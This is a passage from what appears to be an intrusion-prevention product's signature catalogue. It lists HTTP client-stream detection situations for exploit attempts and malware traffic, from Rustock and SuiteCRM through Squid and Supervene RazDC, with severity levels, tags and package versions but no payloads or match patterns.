Tags: Windows, Any Hardware, Rustock spambot, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-272-4219
Vulnerability: Rustock-Spambot
Description:
Back to top

HTTP_CS-SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in SalesAgility SuiteCRM detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SalesAgility, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1654-5242
Vulnerability: SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Sality-Botnet-Activity

About this situation: Sality Botnet Activity Detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Sality-Virus
Description:
Back to top

HTTP_CS-Samba-Swat-Authentication-Base64-BOF

About this situation: Samba SWAT http authentication base64 overflow
Context: HTTP Client Stream
Severity: 10
Tags: Linux, Any Hardware, Samba, CVE2004, Linux not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-585-5211
Vulnerability: HTTP-Samba-Swat-Authentication-Base64-BOF
Description:
Back to top

HTTP_CS-Sambar-Server-Search-Script-DoS

About this situation: Attempt to exploit a buffer overflow in Sambar Server
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Sambar Server, Windows not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Sambar-Server-Search-Script-BOF
Description:
Back to top

HTTP_CS-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling

About this situation: An attempt to exploit a vulnerability in SAP Internet Communication Manager detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, SAP, CVE2022, Windows not specific, SAP not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1833-5242
Vulnerability: SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
Description:
Back to top

HTTP_CS-SAP-Internet-Graphics-Server-XMLCHART-Xxe

About this situation: An attempt to exploit a vulnerability in SAP Internet Graphics Servers.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP Internet Graphics Server, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Vulnerability: SAP-Internet-Graphics-Server-XMLCHART-Xxe
Description:
Back to top

HTTP_CS-SAP-Solution-Manager-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in SAP Solution Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, SAP Solution Manager, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: SAP-Solution-Manager-Remote-Command-Execution
Description:
Back to top

HTTP_CS-Savant-Web-Server-Overflow

About this situation: An attempt to exploit a Savant Web Server Overflow vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Savant Web Server, CVE2002, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Vulnerability: Savant-Web-Server-Overflow
Description:
Back to top

HTTP_CS-Schneider-Electric-Struxureware-Data-Center-Expert-Firmware-Update-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Schneider Electric Struxureware Data Center Expert detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric Struxureware Data Center Expert, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Schneider-Electric-Struxureware-Data-Center-Expert-Fwupd-Directory-Traversal
Description:
Back to top

HTTP_CS-Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service

About this situation: A vulnerability in Schneider Electric Vijeo Web Gate Server allowing denial of service.
Context: HTTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Schneider Electric Vijeo Web Gate Server, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service
Description:
Back to top

HTTP_CS-Script-In-HTTP-POST

About this situation: A script was detected in a HTTP POST request
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Script-In-HTTP-POST
Description:
Back to top

HTTP_CS-Seagate-Business-NAS-Remote-Code-Execution

About this situation: An attempt to exploit a Seagate Business NAS Remote Code Execution vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Seagate Business NAS, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Seagate-Business-NAS-Remote-Code-Execution
Description:
Back to top

HTTP_CS-SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in SearchBlox detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, SearchBlox, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities
Description:
Back to top

HTTP_CS-Selenium-Chrome-RCE

About this situation: An attempt to exploit a vulnerability in Selenium Grid detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Selenium Grid, CVE2022, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1836-5242
Vulnerability: Selenium-Chrome-RCE
Description:
Back to top

HTTP_CS-Server-Name-Variable-Spoof

About this situation: SERVER_NAME variable spoofing exploit
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, x86, IIS 5.0, Apache2, Apache, IIS 5.1, IIS 6.0, CVE2005, Any Operating System not specific, Apache not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-687-5211
Vulnerability: HTTP-Microsoft-IIS-Server-Name-Variable-Spoof
Description:
Back to top

HTTP_CS-Server-Name-Variable-Spoof-2

About this situation: SERVER_NAME variable spoofing exploit
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, x86, IIS 5.0, Apache2, Apache, IIS 5.1, IIS 6.0, CVE2005, Any Operating System not specific, Apache not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-854-5242
Vulnerability: HTTP-Microsoft-IIS-Server-Name-Variable-Spoof
Description:
Back to top

HTTP_CS-Shared-Variables-For-Client-Stream-Context

About this situation: This fingerprint sets shared variables
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-1870-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_CS-Shopware-PHP-Object-Instantiation-RCE

About this situation: An attempt to exploit a vulnerability in Shopware detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Shopware, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Shopware-PHP-Object-Instantiation-RCE
Description:
Back to top

HTTP_CS-Siemens-WinCC-TIA-Portal-MiniWeb-DoS

About this situation: A vulnerability in Siemens WinCC TIA Portal, allowing DoS.
Context: HTTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Siemens WinCC TIA Portal, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Siemens-WinCC-TIA-Portal-MiniWeb-DoS
Description:
Back to top

HTTP_CS-Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460

About this situation: An attempt to exploit a vulnerability in ALEOS ACEManager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ALEOS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1664-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
Description:
Back to top

HTTP_CS-Simple-PHP-Blog-Remote-Command-Execution

About this situation: An attempt to exploit a Simple PHP Blog Remote Command Execution vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Simple PHP Blog, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Vulnerability: Simple-PHP-Blog-Remote-Command-Execution
Description:
Back to top

HTTP_CS-Sitecore-Experience-Platform-Preauth-Deserialization-RCE

About this situation: An attempt to exploit a vulnerability in Sitecore XP detected.
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sitecore XP, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1431-5242
Last changed: sgpkg-ips-1461-5242
Vulnerability: Sitecore-Experience-Platform-Preauth-Deserialization-RCE
Description:
Back to top

HTTP_CS-SKYPE-Client-Installed

About this situation: Skype client installed
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Skype, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-516-5211
Vulnerability: SKYPE-Network-Usage
Description:
Back to top

HTTP_CS-Skype-Client-Version-Check

About this situation: Skype client version check
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Skype, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-516-5211
Vulnerability: SKYPE-Network-Usage
Description:
Back to top

HTTP_CS-Slowloris-DOS

About this situation: Slowloris HTTP DoS
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2007, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-484-5211
Vulnerability: Slowloris-HTTP-DOS-Tool
Description:
Back to top

HTTP_CS-Smokeloader-Malware-Infection-Traffic

About this situation: Smokeloader malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: Botnet-Smokeloader
Description:
Back to top

HTTP_CS-SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Small Office Home Office (SOHO) Router Devices containing an old version of AllegroSoft ROMPager embedded webserver detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass
Description:
Back to top

HTTP_CS-Solaris-Answerbook2-Format-Strings-Vulnerability

About this situation: An attempt to exploit a vulnerability in Solaris Answerbook2 server
Context: HTTP Client Stream
Severity: 10
Tags: Solaris, Any Hardware, CVE1999, Solaris not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Solaris-Answerbook2-Format-Strings-Vulnerability
Description:
Back to top

HTTP_CS-Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Security Event Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Security Event Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection

About this situation: An attempt to exploit a vulnerability in SolarWinds Storage Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Storage Manager, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection
Description:
Back to top

HTTP_CS-Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Sonatype Nexus Repository Manager 3 OSS/Pro detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sonatype Nexus Repository Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal
Description:
Back to top

HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2022-22274

About this situation: An attempt to exploit a vulnerability in SonicWall detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: SonicWall-Stack-Buffer-Overflow-CVE-2022-22274
Description:
Back to top

HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2023-0656

About this situation: An attempt to exploit a vulnerability in SonicWall detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: SonicWall-Stack-Buffer-Overflow-CVE-2023-0656
Description:
Back to top

HTTP_CS-Sony-Xcp-Content-Protection-Software

About this situation: Detects Sony XCP content protection software's Internet activity
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, Sony XCP, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Sony-Xcp-Content-Protection-Software
Description:
Back to top

HTTP_CS-SoreFang-Malware-Infection-Traffic

About this situation: SoreFang malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: SoreFang-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-SPIP-BigUp-Plugin-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in the BigUp plugin of SPIP detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, SPIP, CVE2024, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: SPIP-BigUp-Plugin-Unauthenticated-RCE
Description:
Back to top

HTTP_CS-Spyeye-Botnet-Request

About this situation: A suspicious request have been made
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Winwebsec-Botnet
Description:
Back to top

HTTP_CS-Spyeye-Traffic

About this situation: SpyEye traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Spyeye-Botnet
Description:
Back to top

HTTP_CS-Squash-YAML-Code-Execution

About this situation: Squash YAML Remote Code Execution vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, Squash, CVE2013, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Squash-YAML-Code-Execution
Description:
Back to top

HTTP_CS-Squid-Acl-Bypass-Using-Null

About this situation: Possible attempt to bypass Squid Access Control List
Context: HTTP Client Stream
Severity: 7
Tags: SCO, Linux, Any Hardware, Squid, CVE2004, Linux not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-158-2032
Vulnerability: Squid-Acl-Bypass-Using-Null
Description:
Back to top

HTTP_CS-Squid-Ntlm-BOF

About this situation: Attempt to exploit a buffer overflow in Squid NTLM authentication
Context: HTTP Client Stream
Severity: 10
Tags: Linux, x86, Squid, CVE2004, Linux not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1225-5242
Vulnerability: Squid-Ntlm-BOF
Description:
Back to top

HTTP_CS-Squid-Proxy-Cache-Manager-Expired-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1715-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Squid-Proxy-Cache-Manager-Expired-Pointer-Dereference
Description:
Back to top

HTTP_CS-Squid-Proxy-Cache-Update-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Squid-Proxy-Cache-Update-Denial-Of-Service
Description:
Back to top

HTTP_CS-Squid-Proxy-Digest-Authentication-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1190-5242
Vulnerability: Squid-Proxy-Digest-Authentication-Denial-Of-Service
Description:
Back to top

HTTP_CS-Squid-Squoison-Host-Header-Cache-Poisoning

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: Squid-Squoison-Host-Header-Cache-Poisoning
Description:
Back to top

HTTP_CS-Squid-Strlistgetitem-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Squid-Strlistgetitem-Denial-Of-Service
Description:
Back to top

HTTP_CS-Squirrelwaffle-Loader-Infection-Traffic

About this situation: Squirrelwaffle loader traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Vulnerability: Squirrelwaffle-Loader-Infection-Traffic
Description:
Back to top

HTTP_CS-Srizbi-Spambot

About this situation: Srizbi spambot command and control channel communication detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Srizbi spambot, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-618-5211
Vulnerability: Srizbi-Spambot
Description:
Back to top

HTTP_CS-STARWHALE-Malware-C2-Traffic

About this situation: STARWHALE malware C2 traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Vulnerability: STARWHALE-Malware-C2-Traffic
Description:
Back to top

HTTP_CS-StealBit-Malware-Infection-Traffic

About this situation: StealBit malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Vulnerability: StealBit-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-Studio-42-elFinder-Elfindervolumedriver-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Studio-42 elFinder detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, elFinder, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1459-5242
Last changed: sgpkg-ips-1459-5242
Vulnerability: Studio-42-elFinder-Elfindervolumedriver-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Subversion-Apr-Time-T-System-Compromise

About this situation: Subversion's apr_time_t data conversion buffer overflow attempt
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-161-2032
Vulnerability: SVN-Subversion-Apr-Time-T-System-Compromise
Description:
Back to top

HTTP_CS-SugarCRM-PHP-Unserialize-Vulnerability

About this situation: A PHP unserialize() vulnerability in SugarCRM.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SugarCRM, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: SugarCRM-PHP-Unserialize-Vulnerability
Description:
Back to top

HTTP_CS-SuiteCRM-Authenticated-SQL-Injection-In-Export-Functionality

About this situation: An attempt to exploit a vulnerability in SuiteCRM detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SuiteCRM, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1507-5242
Vulnerability: SuiteCRM-Authenticated-SQL-Injection-In-Export-Functionality
Description:
Back to top

HTTP_CS-Sun-Java-Web-Server-WebDAV-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Sun Java webserver
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Web Server, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Sun-Java-WebDAV-Propfind-Format-String-Vulnerability
Description:
Back to top

HTTP_CS-Sun-One-Iplanet-Chunked-Encoding-BOF

About this situation: Attempt to exploit a buffer overflow in Sun ONE / iPlanet Server
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, x86, iPlanet, Sun ONE Web Server, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-509-5211
Vulnerability: Sun-One-Iplanet-Chunked-Enconding-BOF
Description:
Back to top

HTTP_CS-Supervene-RazDC-Create-User-Code-Injection

About this situation: An attempt to exploit a vulnerability in Supervene RazDC detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Supervene RazDC, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: Supervene-RazDC-Create-User-Code-Injection
Description:
Back to top

HTTP_CS-Supervene-RazDC-Reset-Password-Code-Injection

About this situation: An attempt to exploit a vulnerability in Supervene RazDC detected
Context: HTTP Client Stream
Severity: 7
